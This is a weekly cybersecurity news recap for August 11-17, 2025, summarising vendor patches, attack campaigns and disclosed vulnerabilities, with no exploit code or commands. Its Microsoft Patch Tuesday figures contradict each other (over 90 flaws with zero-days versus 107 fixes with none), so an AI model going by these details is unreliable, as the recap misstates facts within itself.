News Recap: August 11-17, 2025

Highlights of the Week

• Microsoft released its August “Patch Tuesday” on August 12, fixing over 90 security flaws. Among these were multiple zero-day vulnerabilities in Windows and Office suites that could permit remote code execution.
• Cisco issued emergency advisories for vulnerabilities in IOS and NX-OS, some of which could allow denial-of-service attacks on networking infrastructure. The company also flagged growing supply chain threats, especially after a breach attempt targeting telecom firms using compromised Cisco equipment.
• Fortinet pushed updates to its FortiGate firewalls to address critical buffer overflow issues—mitigating potential ransomware risks.
• Noteworthy attacks this week included a major DDoS assault on European financial institutions, likely state-sponsored, which disrupted services across the region.
• New ransomware variants, such as LockBit, exploited unpatched systems, particularly in health care.
• Security experts issued warnings about AI-assisted attacks, urging organizations to double down on patching, threat intelligence, and proactive defense.

Cyber Attacks

• ClickFix Trick Exploits Windows
  Threat actors are using a technique dubbed “ClickFix,” luring users via phishing or fake error alerts to run malicious PowerShell commands. This can drop malware like Havoc, which maintains persistence and exfiltrates data through cloud services. Organizations should scrutinize PowerShell logs and educate users to avoid suspicious prompts.
• DarkBit Hits VMware ESXi Hosts
• The DarkBit group is targeting VMware ESXi servers with custom ransomware that encrypts VM disk files using AES-128-CBC and RSA-2048. Some decryptors were later released, but victims are urged to patch systems and monitor abnormal encryption activity.
• Attack on Canada’s House of Commons
• On August 9, attackers leveraged a Microsoft vulnerability to infiltrate Canada’s House of Commons infrastructure, exfiltrating employee names, roles, and email addresses. The Canadian Centre for Cyber Security is investigating; attribution has not been confirmed.
• New FireWood Backdoor Targets Linux
• A variant of FireWood, associated with the Gelsemium APT, is attacking Linux servers via web shells, enabling command execution and data theft. Administrators should scan for web shell artifacts and reinforce shell access controls.
• PhantomCard Android Malware Uses NFC for Theft
• PhantomCard, a Brazilian cybercrime tool, abuses NFC to steal card information in real time. Delivered through fake security apps, it masquerades as a payment terminal. Users should only install verified apps and disable NFC when idle.
• Phishing via Microsoft Teams Remote Control
• Malicious actors are exploiting Teams’ remote-control feature during meetings, tricking victims into granting system access. To counter this, organizations should disable remote control or verify access requests thoroughly.
• Gmail Phishing Evades Filters
• A sophisticated Gmail phishing campaign now bypasses defenses by spoofing Google alerts, passing DKIM checks, and hosting credential-harvesting pages on sites.google.com. Recipients receive fake subpoenas or security notices. Users should inspect sender details and avoid clicking on unsolicited links.

Vulnerabilities Disclosed

• Ivanti Connect Secure / Policy Secure / ZTA
  Four issues were patched, including two high-severity buffer overflow vulnerabilities (CVE-2025-5456, CVE-2025-5462). Other fixes addressed XML external entity injection and symbolic link mishandling. Cloud users benefit from auto-updates; on-premises users must patch manually.

• SAP August Security Release
  SAP addressed 15 vulnerabilities—three were critical code injection flaws (CVEs 2025-42957, 2025-42950, 2025-27429) in S/4HANA and Landscape Transformation. Other issues included authorization bypass, XSS, and path traversal in NetWeaver and Business One. Update priorities should target high-risk enterprise systems first.

• Microsoft August Patch – 107 Fixes
  Microsoft’s update fixes 107 vulnerabilities, including 36 remote-code execution flaws (10 critical) across components like Windows Graphics, Office, Excel, and Hyper-V. Elevation-of-privilege issues (40 total) also feature prominently, along with spoofing, denial-of-service, and information disclosure flaws. No zero-days were disclosed this cycle, but quick patching is highly recommended.

• FortiSIEM OS Command-Injection (CVE-2025-25256)
  A serious flaw in Fortinet’s FortiSIEM permits remote command execution without authentication. Affected versions include 5.4–7.3. Proof-of-concept exploits are already circulating. Users are advised to upgrade or restrict port 7900 access immediately.

• Rooted Android Full Control Vulnerability
  A newly revealed vulnerability affects rooted Android devices, potentially giving attackers full control and exposing data. Devices globally could be at risk. Users should reassess rooting and bolster defenses.

• Cisco Secure Client / Secure Firewall DLL Hijacking
  In versions up to 5.1.7.80, a local attacker with authentication may hijack DLLs via weak IPC validation, executing arbitrary code with SYSTEM privileges. The fix is available starting with version 5.1.8.1.

• Snort 3 Detection Weakness
  Vulnerabilities in Snort 3 may allow attackers to elude detection and escalate privileges. Patches targeting relevant Linux kernels and toolsets are essential.

• Elastic EDR Zero Day
  A zero-day in Elastic EDR bypasses endpoint defenses, enabling malware execution and leading to system crashes (BSOD). The flaw was disclosed August 17, 2025—urgent updates are required for protection.